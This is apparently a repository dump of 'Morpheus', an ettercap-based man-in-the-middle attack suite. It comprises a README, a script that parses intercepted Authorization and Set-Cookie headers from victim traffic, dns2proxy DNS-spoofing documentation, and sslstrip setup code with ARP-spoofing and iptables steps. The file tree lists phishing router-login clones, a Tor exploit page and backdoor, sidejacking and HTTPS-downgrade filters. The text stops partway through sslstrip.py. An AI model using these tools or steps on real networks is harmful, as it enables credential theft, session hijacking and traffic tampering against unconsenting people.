├── README.md ├── bin ├── .police-naples.png ├── DebugMe.sh ├── IG.sh ├── Utils │ ├── dns2proxy │ │ ├── .gitignore │ │ ├── README.md │ │ ├── dns2proxy.py │ │ ├── domains.cfg │ │ ├── handler_msg.sh │ │ ├── nospoof.cfg │ │ ├── nospoofto.cfg │ │ ├── resolv.conf │ │ ├── spoof.cfg │ │ └── victims.cfg │ ├── smbrelayx.py │ └── sslstrip-0.9 │ │ ├── COPYING │ │ ├── README │ │ ├── lock.ico │ │ ├── setup.py │ │ ├── sslstrip.py │ │ └── sslstrip │ │ ├── ClientRequest.py │ │ ├── CookieCleaner.py │ │ ├── DnsCache.py │ │ ├── SSLServerConnection.py │ │ ├── ServerConnection.py │ │ ├── ServerConnectionFactory.py │ │ ├── StrippingProxy.py │ │ ├── URLMonitor.py │ │ └── __init__.py ├── etter.conf ├── etter.dns ├── http.lua ├── phishing │ ├── Android-DOS-4.0.3.html │ ├── EasterEgg.html │ ├── Firefox-D0S-49.0.1.html │ ├── Google Sphere_files │ │ ├── api │ │ ├── defaulten.js │ │ └── ga.js │ ├── Google_prank_180 │ │ ├── Google.html │ │ └── googlelogo_color_272x92dp.png │ ├── clone.html │ ├── index.html │ ├── miss.png │ ├── router-modem │ │ ├── DLINK │ │ │ ├── img_wireless_bottom.gif │ │ │ ├── index.html │ │ │ ├── logo.gif │ │ │ ├── md5.js │ │ │ ├── substyle_DIR-615.css │ │ │ ├── ubicom.js │ │ │ └── xml_data.js │ │ ├── TPLink │ │ │ ├── encrypt.js.download │ │ │ ├── index.html │ │ │ ├── saved_resource.html │ │ │ ├── top1_1.jpg │ │ │ ├── top1_2.jpg │ │ │ └── top2.jpg │ │ ├── Technicolor │ │ │ ├── index.html │ │ │ ├── spacer.gif │ │ │ ├── styles.css │ │ │ └── user__xl.gif │ │ ├── ZTE │ │ │ ├── chinese_1.gif │ │ │ ├── close.gif │ │ │ ├── help.gif │ │ │ ├── index.html │ │ │ ├── login.css │ │ │ └── styleen.css │ │ ├── index.html │ │ ├── login.html │ │ └── new.html │ └── tor_0day │ │ ├── License │ │ ├── Tor-Exploit.html │ │ └── cssbanner.js ├── trigger.bat ├── warn.ogg ├── warn.sh └── www.gmail.com.pem ├── filters ├── EasterEgg.eft ├── IG.eft ├── UserAgent.eft ├── XSSBypass.eft ├── backdoor-on-the-fly.eft ├── chat_services.eft ├── cryptocurrency.eft ├── dhcp-discovery.eft ├── firewall.eft ├── grab_hosts.eft ├── https_downgrade.eft ├── img_replace.eft ├── packet_drop.eft ├── redirect.eft ├── rotate.eft ├── sidejacking.eft ├── ssh_downgrade.eft ├── template.eft ├── text_replace.eft ├── title_replace.eft └── top_ports.eft ├── logs └── .set ├── morpheus.sh ├── output └── .set └── settings /README.md: -------------------------------------------------------------------------------- 1 | [![Version](https://img.shields.io/badge/MORPHEUS-2.2-brightgreen.svg?maxAge=259200)]() 2 | [![Stage](https://img.shields.io/badge/Release-STABLE-brightgreen.svg)]() 3 | [![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]() 4 | [![AUR](https://img.shields.io/aur/license/yaourt.svg)]() 5 | 6 | # Morpheus - automated ettercap TCP/IP Hijacking tool 7 | ![morpheus v2.2-BETA](http://i.cubeupload.com/SpNvM5.png) 8 | 9 | Version release: v2.2 - STABLE 10 | Author: pedro ubuntu [ r00t-3xp10it ] 11 | Codename: oneiroi phobetor (The mithologic dream greek god) 12 | Distros Supported: Linux Ubuntu, Kali, Debian, BackBox, Parrot OS 13 | Suspicious-Shell-Activity© (SSA) RedTeam develop @2018 14 | 15 |
16 | 17 | # LEGAL DISCLAMER 18 | The author does not hold any responsibility for the bad use of this tool, 19 | remember that attacking targets without prior consent it's illegal and punished by law. 20 | 21 | # Framework description 22 | Morpheus it's a Man-In-The-Middle (mitm) suite that allows users to manipulate 23 | tcp/udp data using ettercap, urlsnarf, msgsnarf and tcpkill as backend applications. 24 | but this tool main objective its not to provide an easy way to exploit/sniff targets, 25 | but ratter a call of attemption to tcp/udp manipulations technics (etter filters) 26 | 27 | Morpheus ships with some pre-configurated filters but it will allow users to improve them 28 | when launch the attack (morpheus scripting console). In the end of the attack morpheus will 29 | revert the filter back to is default stage, this will allow users to improve filters at 30 | running time without the fear of messing with filter command syntax and spoil the filter. 31 | "Perfect for scripting fans to safely test new concepts"... 32 | 33 | HINT: morpheus allow you to improve filters in 2 diferent ways 34 | 1º - Edit filter before runing morpheus and the 'changes' will be permanent 35 | 2º - Edit filter using 'morpheus scripting console' and the changes are active only once 36 | 37 | 38 |
39 | 40 | # What can we acomplish by using filters? 41 | morpheus comes with a collection of filters writen be me to acomplish various tasks: 42 | replacing images in webpages, replace text in webpages, inject payloads in webpages, 43 | denial-of-service attacks (drop,kill packets from source), redirect browser traffic 44 | to another domain and gives you the ability to build compile your filter from scratch 45 | and run it through morpheus framework (option W). 46 | 47 | "filters can be extended using browser languages like: javascript,css,flash,etc"... 48 | 49 | 50 | > In this example we are using " HTML tag" to inject an rediretion url into target request 51 | ![morpheus v1.6-Alpha](http://i.cubeupload.com/jn83zh.png) 52 | > In this example we are using 'CSS3' to trigger webpage 180º rotation 53 | ![morpheus v1.6-Alpha](http://i.cubeupload.com/XSWm0P.png) 54 | 55 |
56 | 57 | # Framework limitations 58 | 1º - morpheus will fail if target system its protected againt arp poison atacks 59 | 2º - target system sometimes needs to clear the net cache for arp poison to be effective 60 | 3º - many attacks described in morpheus may be dropped by the target HSTS detection sys. 61 | 62 | 63 | > 4º - morpheus needs ettercap to be executed with higth privileges (uid 0 | gid 0).
64 | > correct ettercap configuration display (running as Admin without ssl disectors active) 65 | ![morpheus v1.6-Alpha](http://i.cubeupload.com/RIq2yO.png) 66 | 67 | By default morpheus (at startup) will replace the original etter.conf/etter.dns files 68 | provided by ettercap. On exit morpheus will revert those files to is original state.. 69 | [ ITS IMPORTANTE TO EXIT THE TOOL PROPER TO REVERT THE CHANGES MADE (press 'E' to exit) ] 70 | 71 |
72 | 73 | # Dependencies 74 | required: ettercap, nmap, zenity, apache2 75 | sub-dependencies: driftnet, dsniff (urlsnarf,tcpkill,msgsnarf), sslstrip-0.9, dns2proxy 76 | 77 | # Credits 78 | ettercap (alor&naga) | nmap (fyodor) | apache2 (Rob McCool) | dsniff (Dug Song) 79 | filters: irongeek (replace img) | seannicholls (rotate 180º) | TheBlaCkCoDeR09 (ToR-Browser-0day) 80 | 81 |
82 | 83 | # Download/Install 84 | 1º - git clone https://github.com/r00t-3xp10it/morpheus.git 85 | 2º - cd morpheus 86 | 3º - chmod -R +x *.sh 87 | 4º - chmod -R +x *.py 88 | 5º - nano settings 89 | 6º - sudo ./morpheus.sh 90 | 91 |


92 | 93 | ## Nmap scans available [option S]
94 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/O2h9Hd.png) 95 | 96 | Morpheus v2.2 allows is users to scan with nmap sending one fake User_Agent [ IPhone ] 97 | Activate this special funtion in [ settings ] file under morpheus main folder. 98 | HINT: This setting its only available in morpheus [ scan LAN for live hosts ] 99 | 100 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/hp9r2u.png) 101 | 102 | HINT: we can edit morpheus http.lua lib and input other user_agent,before run the tool. 103 | HINT: My http.lua lib modified also allows diferent user_agent inputs at run-time like: 104 | nmap -sV --script-args http.useragent="Apache-HttpClient/4.0.3 (java 1.5)" Target-Ip 105 | 106 | 107 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/v1aIGd.png) 108 | 109 |
110 | 111 | ## Detecting DHCP requests to access local lan [option 17]
112 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/EKAYLP.jpg) 113 | 114 |
115 | 116 | ## Detecting-blocking crypto currency connections [option 18]
117 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/cbAoeY.png) 118 | 119 |
120 | 121 | ## Redirect all devices in LAN to google prank [option 19]
122 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/ZE4Cy5.png) 123 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/xxmyex.png) 124 | `HINT: This module depends of .im domain not beeing redirected`
125 | 126 |
127 | 128 | ## firewall filter screenshots [option 1]
129 | 130 | firewall [option 1] pre-configurated filter will capture credentials from the follow services: 131 | http,ftp,ssh,telnet (facebook uses https/ssl :( ) report suspicious connections, report common 132 | websocial browsing (facebook,twitter,youtube), report the existence of botnet connections like: 133 | Mocbot IRC Bot, Darkcomet, redirect browser traffic and allow users to block connections (drop,kill) 134 | "Remmenber: morpheus gives is users the ability to 'add more rules' to filters befor execution" 135 | 136 | [morpheus] host:192.168.1.67 [ -> ] port:23 telnet ☆ 137 | Source ip addr flow destination rank good 138 | 139 | [morpheus] host:192.168.1.67 [ <- ] port:23 telnet ☠ 140 | Destination ip flow source port rank suspicious 141 | 142 | 143 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/nbgSuj.png) 144 | 145 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/Hx0JV4.png) 146 | 147 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/LzqZGc.png) 148 | 149 | ![morpheus v2.2-Alpha](http://i.cubeupload.com/z8M94O.png) 150 | 151 | > Basically firewall filter will act like one offensive and defensive tool analyzing the 152 | > tcp/udp data flow to report logins,suspicious traffic,brute-force,block target ip,etc. 153 |
154 | 155 | --- 156 | 157 | 158 | _EOF 159 | 160 | -------------------------------------------------------------------------------- /bin/.police-naples.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/.police-naples.png -------------------------------------------------------------------------------- /bin/IG.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ## 3 | # 'http tcp header information gathering' 4 | # This script will parse tcp header data collected by morpheus under MITM attacks. 5 | # Basic we use morpheus.sh tool to poison target host under LAN to be abble to 6 | # capture is network communications and extract juice info for tcp headers. 7 | # Special Thanks: shanty damayanti 8 | ## resize -s 27 109 > /dev/null 9 | 10 | 11 | 12 | # 13 | # Variable declarations function .. 14 | # 15 | cd .. 16 | rhost=`cat output/ip.mop | egrep -m 1 "target:" | cut -d ':' -f2` 17 | iface=`netstat -r | grep "default" | awk {'print $8'}` 18 | mod=`route -n | grep "UG" | awk {'print $2'} | tr -d '\n'` 19 | # 20 | # Use warning sounds in every capture? 21 | # Special thanks: shanty damayanti (parrot OS) 22 | # 23 | echo "╔───────────────────────────────────────╗" 24 | echo "| http tcp header information gathering |" 25 | echo "╚───────────────────────────────────────╝" 26 | echo -n "Be alerted by a BEEP in every
capture? (y/n):";read op 27 | if [ $op = "y" ] || [ $op = "yes" ]; then 28 | OGG=`locate .ogg | grep "default/alerts" | head -3 | tail -1` 29 | warn=yes 30 | else 31 | warn=no 32 | fi 33 | 34 | 35 | 36 | # 37 | # Script banner 38 | # 39 | clear 40 | echo "╔───────────────────────────────────────╗" 41 | echo "| http tcp header information gathering |" 42 | echo "╚───────────────────────────────────────╝" 43 | echo " | Interface : $iface" 44 | echo " | Rhost : $rhost" 45 | echo " |_ Gateway : $mod" 46 | echo "" 47 | 48 | 49 | # 50 | # Start of loop function .. 51 | # 52 | while : 53 | do 54 | 55 | # check for logfile presence .. 56 | if [ -e logs/IG.log ]; then 57 | hour=`date | awk {'print $4,$5,$6'}` 58 | echo "" && echo "Tcp header capture" 59 | echo "Hour/Time: $hour" 60 | # 61 | # Play alert sound (paplay) settings .. 62 | # 63 | if [ $warn = "yes" ]; then 64 | if [ -e bin/warn.ogg ]; then 65 | paplay bin/warn.ogg 66 | else 67 | paplay $OGG 68 | fi 69 | fi 70 | 71 | 72 | # 73 | # Parsing captured data from IG.log file .. 74 | # 75 | TST=`cat logs/IG.log | egrep -m 1 "Tk:" | awk {'print $2'}` > /dev/nul 2>&1 76 | DNT=`cat logs/IG.log | egrep -m 1 "DNT:" | awk {'print $2'}` > /dev/nul 2>&1 77 | HST=`cat logs/IG.log | egrep -m 1 "Host:" | awk {'print $2'}` > /dev/nul 2>&1 78 | FEM=`cat logs/IG.log | egrep -m 1 "From:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1 79 | RFR=`cat logs/IG.log | egrep -m 1 "Referer:" | awk {'print $2,$3'}` > /dev/nul 2>&1 80 | SER=`cat logs/IG.log | egrep -m 1 "Server:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1 81 | FWR=`cat logs/IG.log | egrep -m 1 "Forwarded:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1 82 | XFO=`cat logs/IG.log | egrep -m 1 "X-Frame-Options:" | awk {'print $2'}` > /dev/nul 2>&1 83 | CON=`cat logs/IG.log | egrep -m 1 "Connection:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1 84 | CTT=`cat logs/IG.log | egrep -m 1 "Content-Type:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1 85 | AUT=`cat logs/IG.log | egrep -m 1 "Authorization:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1 86 | XSS=`cat logs/IG.log | egrep -m 1 "X-XSS-Protection:" | awk {'print $2,$3'}` > /dev/nul 2>&1 87 | XCO=`cat logs/IG.log | egrep -m 1 "X-Content-Type-Options:" | awk {'print $2'}` > /dev/nul 2>&1 88 | CHC=`cat logs/IG.log | egrep -m 1 "Cache-Control:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1 89 | XFH=`cat logs/IG.log | egrep -m 1 "X-Forwarded-Host:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1 90 | CEN=`cat logs/IG.log | egrep -m 1 "Content-Encoding:" | awk {'print $2,$3,$4'}` > /dev/nul 2>&1 91 | ACS=`cat logs/IG.log | egrep -m 1 "Accept-Charset:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1 92 | CTL=`cat logs/IG.log | egrep -m 1 "Content-Language:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1 93 | STC=`cat logs/IG.log | egrep -m 1 "Set-Cookie:" | awk {'print $2,$3,$4,$5,$6,$7'}` > /dev/nul 2>&1 94 | LGA=`cat logs/IG.log | egrep -m 1 "Accepted-Language:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1 95 | HSTS=`cat logs/IG.log | egrep -m 1 "Strict-Transport-Security:" | awk {'print $2,$3,$4,$5'}` > /dev/nul 2>&1 96 | ACAM=`cat logs/IG.log | egrep -m 1 "Access-Control-Allow-Methods:" | awk {'print $2,$3,$4,$5,$6'}` > /dev/nul 2>&1 97 | TUA=`cat logs/IG.log | egrep -m 1 "User-Agent:" | awk {'print $2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14'}` > /dev/nul 2>&1 98 | 99 | 100 | # 101 | # Print OnScreen headers captured .. 102 | # 103 | sleep 0.8 104 | echo "------------------------------------------------" 105 | echo "Host : $HST" 106 | echo "DNT(Do Not Track) : $DNT" 107 | echo "Tk(track status) : $TST" 108 | echo "Content-Language : $CTL" 109 | echo "Accepted-Language : $LGA" 110 | echo "Connection : $CON" 111 | echo "Content-Encoding : $CEN" 112 | echo "X-XSS-Protection : $XSS" 113 | echo "From : $FEM" 114 | echo "Server : $SER" 115 | echo "Allow-Methods : $ACAM" 116 | echo "Cache-Control : $CHC" 117 | echo "X-Forwarded-Host : $XFH" 118 | echo "X-Content-Type-Opt : $XCO" 119 | echo "X-Frame-Options : $XFO" 120 | echo "Accept-Charset : $ACS" 121 | echo "Content-Type : $CTT" 122 | echo "HSTS : $HSTS" 123 | echo "Authorization : $AUT" 124 | echo "Set-Cookie : $STC" 125 | echo "Forwarded : $FWR" 126 | echo "Referer : $RFR" 127 | echo "User-Agent : $TUA" 128 | echo "------------------------------------------------" 129 | echo "[HELP] HTTP Headers : https://mzl.la/2OWMOte" 130 | 131 | 132 | # 133 | # Build new logfile with ALL the diferent packets data captured 134 | # for later review ( ../morpheus/logs/192.168.1.71-header_capture.log ). 135 | # 136 | if [ -d logs ]; then 137 | echo "" >> logs/$rhost-header_capture.log 138 | echo "Tcp header capture" >> logs/$rhost-header_capture.log 139 | echo "Target ip: $rhost" >> logs/$rhost-header_capture.log 140 | echo "Hour/Time: $hour" >> logs/$rhost-header_capture.log 141 | echo "------------------------------------------------" >> logs/$rhost-header_capture.log 142 | echo "Host : $HST" >> logs/$rhost-header_capture.log 143 | echo "DNT(Do Not Track) : $DNT" >> logs/$rhost-header_capture.log 144 | echo "Tk(track status) : $TST" >> logs/$rhost-header_capture.log 145 | echo "Content-Language : $CTL" >> logs/$rhost-header_capture.log 146 | echo "Accepted-Language : $LGA" >> logs/$rhost-header_capture.log 147 | echo "Connection : $CON" >> logs/$rhost-header_capture.log 148 | echo "Content-Encoding : $CEN" >> logs/$rhost-header_capture.log 149 | echo "X-XSS-Protection : $XSS" >> logs/$rhost-header_capture.log 150 | echo "From : $FEM" >> logs/$rhost-header_capture.log 151 | echo "Server : $SER" >> logs/$rhost-header_capture.log 152 | echo "Allow-Methods : $ACAM" >> logs/$rhost-header_capture.log 153 | echo "Cache-Control : $CHC" >> logs/$rhost-header_capture.log 154 | echo "X-Forwarded-Host : $XFH" >> logs/$rhost-header_capture.log 155 | echo "X-Content-Type-Opt : $XCO" >> logs/$rhost-header_capture.log 156 | echo "X-Frame-Options : $XFO" >> logs/$rhost-header_capture.log 157 | echo "Accept-Charset : $ACS" >> logs/$rhost-header_capture.log 158 | echo "Content-Type : $CTT" >> logs/$rhost-header_capture.log 159 | echo "HSTS : $HSTS" >> logs/$rhost-header_capture.log 160 | echo "Authorization : $AUT" >> logs/$rhost-header_capture.log 161 | echo "Set-Cookie : $STC" >> logs/$rhost-header_capture.log 162 | echo "Forwarded : $FWR" >> logs/$rhost-header_capture.log 163 | echo "Referer : $RFR" >> logs/$rhost-header_capture.log 164 | echo "User-Agent : $TUA" >> logs/$rhost-header_capture.log 165 | echo "------------------------------------------------" >> logs/$rhost-header_capture.log 166 | echo "[HELP] HTTP Headers : https://mzl.la/2OWMOte" >> logs/$rhost-header_capture.log 167 | echo "" >> logs/$rhost-header_capture.log 168 | else 169 | echo "[ERROR] ../morpheus/logs/$rhost-header_capture.log [ NOT BUILD ]" 170 | fi 171 | 172 | 173 | echo "" 174 | # delete temp logfile 175 | rm -f logs/IG.log > /dev/nul 2>&1 176 | sleep 1.3 177 | fi 178 | 179 | 180 | # end loop 181 | done 182 | 183 | # exit script 184 | exit 185 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | *.txt 3 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/README.md: -------------------------------------------------------------------------------- 1 | dns2proxy 2 | ========= 3 | 4 | Offensive DNS server 5 | 6 | This tools offer a different features for post-explotation once you change the DNS server to a Victim. 7 | 8 | 9 | Feature 1 10 | --------- 11 | 12 | Traditional DNS Spoof adding to the response the original IP address. 13 | 14 | Using spoof.cfg file: 15 | 16 | hostname ip.ip.ip.ip 17 | 18 | >root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg 19 | > 20 | >// launch in another terminal dns2proxy.py 21 | > 22 | >root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1 23 | >Server: 127.0.0.1 24 | >Address: 127.0.0.1#53 25 | > 26 | >Name: www.s21sec.com 27 | >Address: 1.1.1.1 28 | >Name: www.s21sec.com 29 | >Address: 88.84.64.30 30 | 31 | 32 | or you can use domains.cfg file to spoof all host of a same domain: 33 | 34 | >root@kali:~/demoBH/dns2proxy# cat dominios.cfg 35 | >.domain.com 192.168.1.1 36 | > 37 | >root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1 38 | >Server: 127.0.0.1 39 | >Address: 127.0.0.1#53 40 | > 41 | >Name: aaaa.domain.com 42 | >Address: 192.168.1.1 43 | 44 | Hostnames at nospoof.cfg will no be spoofed. 45 | 46 | Feature 2 47 | --------- 48 | 49 | This feature implements the attack of DNS spoofing adding 2 IP address at the top of the resolution and configuring the system to forward the connections. 50 | Check my slides at BlackHat Asia 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and the [Demo Video] (http://www.youtube.com/watch?v=cJtbxX1HS5I). 51 | 52 | To launch this attach there is a shellscript that automatically configure the system using IP tables. You must edit this file to adapt it to your system. DON´T FORGET AdminIP variable!!!! 53 | Both IPs must be at the same system to let dns2proxy.py configurate the forwarding 54 | 55 | Usage: ia.sh < interface > [ip1] [ip2] 56 | 57 | 58 | >root@kali:~/dns2proxy# ./ia.sh eth0 172.16.48.128 172.16.48.230 59 | >Non spoofing imap.gmail.com 60 | >Non spoofing mail.s21sec.com 61 | >Non spoofing www.google.com 62 | >Non spoofing www.apple.com 63 | >Non spoofing ccgenerals.ms19.gamespy.com 64 | >Non spoofing master.gamespy.com 65 | >Non spoofing gpcm.gamespy.com 66 | >Non spoofing launch.gamespyarcade.com 67 | >Non spoofing peerchat.gamespy.com 68 | >Non spoofing gamestats.gamespy.com 69 | >Specific host spoofing www.s21sec.com with 1.1.1.1 70 | >Specific domain IP .domain.com with 192.168.1.1 71 | >binded to UDP port 53. 72 | >waiting requests. 73 | >Starting sniffing in (eth0 = 172.16.48.128).... 74 | > 75 | >< at other terminal > 76 | > 77 | >root@kali:~/dns2proxy# nslookup www.microsoft.com 127.0.0.1 78 | >Server: 127.0.0.1 79 | >Address: 127.0.0.1#53 80 | > 81 | >Name: www.microsoft.com 82 | >Address: 172.16.48.128 83 | >Name: www.microsoft.com 84 | >Address: 172.16.48.230 85 | >Name: www.microsoft.com 86 | >Address: 65.55.57.27 87 | 88 | 89 | The fhtang.sh script will terminate the program and restore normal iptables. 90 | 91 | Hostnames at nospoof.cfg will no be spoofed. 92 | 93 | 94 | Feature 3 95 | --------- 96 | 97 | Automatically the dns server detects and correct the changes thats my sslstrip+ do to the hostnames to avoid HSTS, so will response properly. 98 | 99 | This server is necesary to make the sslstrip+ attack. 100 | 101 | >root@kali:~/dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS response like accounts.google.com 102 | >Server: 127.0.0.1 103 | >Address: 127.0.0.1#53 104 | > 105 | >Name: webaccounts.google.com 106 | >Address: 172.16.48.128 107 | >Name: webaccounts.google.com 108 | >Address: 172.16.48.230 109 | >Name: webaccounts.google.com 110 | >Address: 74.125.200.84 111 | > 112 | >root@kali:~/dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Take care of the 4 w! DNS response like 113 | >Server: 127.0.0.1 www.yahoo.com 114 | >Address: 127.0.0.1#53 115 | > 116 | >Name: wwww.yahoo.com 117 | >Address: 172.16.48.128 118 | >Name: wwww.yahoo.com 119 | >Address: 172.16.48.230 120 | >Name: wwww.yahoo.com 121 | >Address: 68.142.243.179 122 | >Name: wwww.yahoo.com 123 | >Address: 68.180.206.184 124 | 125 | 126 | Instalation 127 | ----------- 128 | 129 | dnspython (www.dnspython.com) is needed. 130 | Tested with Python 2.6 and Python 2.7. 131 | 132 | 133 | Config files description 134 | ------------------------ 135 | 136 | domains.cfg (or dominios.cfg): resolve all hosts for the listed domains with the listed IP 137 | >Ex: 138 | >.facebook.com 1.2.3.4 139 | >.fbi.gov 1.2.3.4 140 | 141 | spoof.cfg : Spoof a host with a ip 142 | >Ex: 143 | >www.nsa.gov 127.0.0.1 144 | 145 | nospoof.cfg: Send always a legit response when asking for these hosts. 146 | >Ex. 147 | >mail.google.com 148 | 149 | nospoofto.cfg: Don't send fake responses to the IPs listed there. 150 | >Ex: 151 | >127.0.0.1 152 | >4.5.6.8 153 | 154 | victims.cfg: If not empty, only send fake responses to these IP addresses. 155 | >Ex: 156 | >23.66.163.36 157 | >195.12.226.131 158 | 159 | resolv.conf: DNS server to forward the queries. 160 | >Ex: 161 | >nameserver 8.8.8.8 162 | 163 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/domains.cfg: -------------------------------------------------------------------------------- 1 | .domain.com 8.8.9.9 2 | .thisisalongdomainnameasdfasdfafsd.com 178.62.64.250 3 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/handler_msg.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/dns2proxy/handler_msg.sh -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/nospoof.cfg: -------------------------------------------------------------------------------- 1 | imap.gmail.com 2 | mail.s21sec.com 3 | www.google.com 4 | www.google.pt 5 | 6 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/nospoofto.cfg: -------------------------------------------------------------------------------- 1 | 127.0.0.1 2 | 3 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/resolv.conf: -------------------------------------------------------------------------------- 1 | nameserver 8.8.8.8 2 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/spoof.cfg: -------------------------------------------------------------------------------- 1 | flash.domain.com 192.168.187.135 2 | 3 | 4 | -------------------------------------------------------------------------------- /bin/Utils/dns2proxy/victims.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/dns2proxy/victims.cfg -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/README: -------------------------------------------------------------------------------- 1 | sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 2 | attacks. 3 | 4 | It requires Python 2.5 or newer, along with the 'twisted' python module. 5 | 6 | Installing: 7 | * Unpack: tar zxvf sslstrip-0.5.tar.gz 8 | * Install twisted: sudo apt-get install python-twisted-web 9 | * (Optionally) run 'python setup.py install' as root to install, 10 | or you can just run it out of the directory. 11 | 12 | Running: 13 | sslstrip can be run from the source base without installation. 14 | Just run 'python sslstrip.py -h' as a non-root user to get the 15 | command-line options. 16 | 17 | The four steps to getting this working (assuming you're running Linux) 18 | are: 19 | 20 | 1) Flip your machine into forwarding mode (as root): 21 | echo "1" > /proc/sys/net/ipv4/ip_forward 22 | 23 | 2) Setup iptables to intercept HTTP requests (as root): 24 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 25 | 26 | 3) Run sslstrip with the command-line options you'd like (see above). 27 | 28 | 4) Run arpspoof to redirect traffic to your machine (as root): 29 | arpspoof -i -t 30 | 31 | More Info: 32 | http://www.thoughtcrime.org/software/sslstrip/ 33 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/lock.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/sslstrip-0.9/lock.ico -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys, os, shutil 3 | from distutils.core import setup, Extension 4 | 5 | 6 | shutil.copyfile("sslstrip.py", "sslstrip/sslstrip") 7 | 8 | setup (name = 'sslstrip', 9 | version = '0.9', 10 | description = 'A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.', 11 | author = 'Moxie Marlinspike', 12 | author_email = 'moxie@thoughtcrime.org', 13 | url = 'http://www.thoughtcrime.org/software/sslstrip/', 14 | license = 'GPL', 15 | packages = ["sslstrip"], 16 | package_dir = {'sslstrip' : 'sslstrip/'}, 17 | scripts = ['sslstrip/sslstrip'], 18 | data_files = [('share/sslstrip', ['README', 'COPYING', 'lock.ico'])], 19 | ) 20 | 21 | print "Cleaning up..." 22 | try: 23 | removeall("build/") 24 | os.rmdir("build/") 25 | except: 26 | pass 27 | 28 | try: 29 | os.remove("sslstrip/sslstrip") 30 | except: 31 | pass 32 | 33 | def capture(cmd): 34 | return os.popen(cmd).read().strip() 35 | 36 | def removeall(path): 37 | if not os.path.isdir(path): 38 | return 39 | 40 | files=os.listdir(path) 41 | 42 | for x in files: 43 | fullpath=os.path.join(path, x) 44 | if os.path.isfile(fullpath): 45 | f=os.remove 46 | rmgeneric(fullpath, f) 47 | elif os.path.isdir(fullpath): 48 | removeall(fullpath) 49 | f=os.rmdir 50 | rmgeneric(fullpath, f) 51 | 52 | def rmgeneric(path, __func__): 53 | try: 54 | __func__(path) 55 | except OSError, (errno, strerror): 56 | pass 57 | -------------------------------------------------------------------------------- /bin/Utils/sslstrip-0.9/sslstrip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike" 6 | __email__ = "moxie@thoughtcrime.org" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print 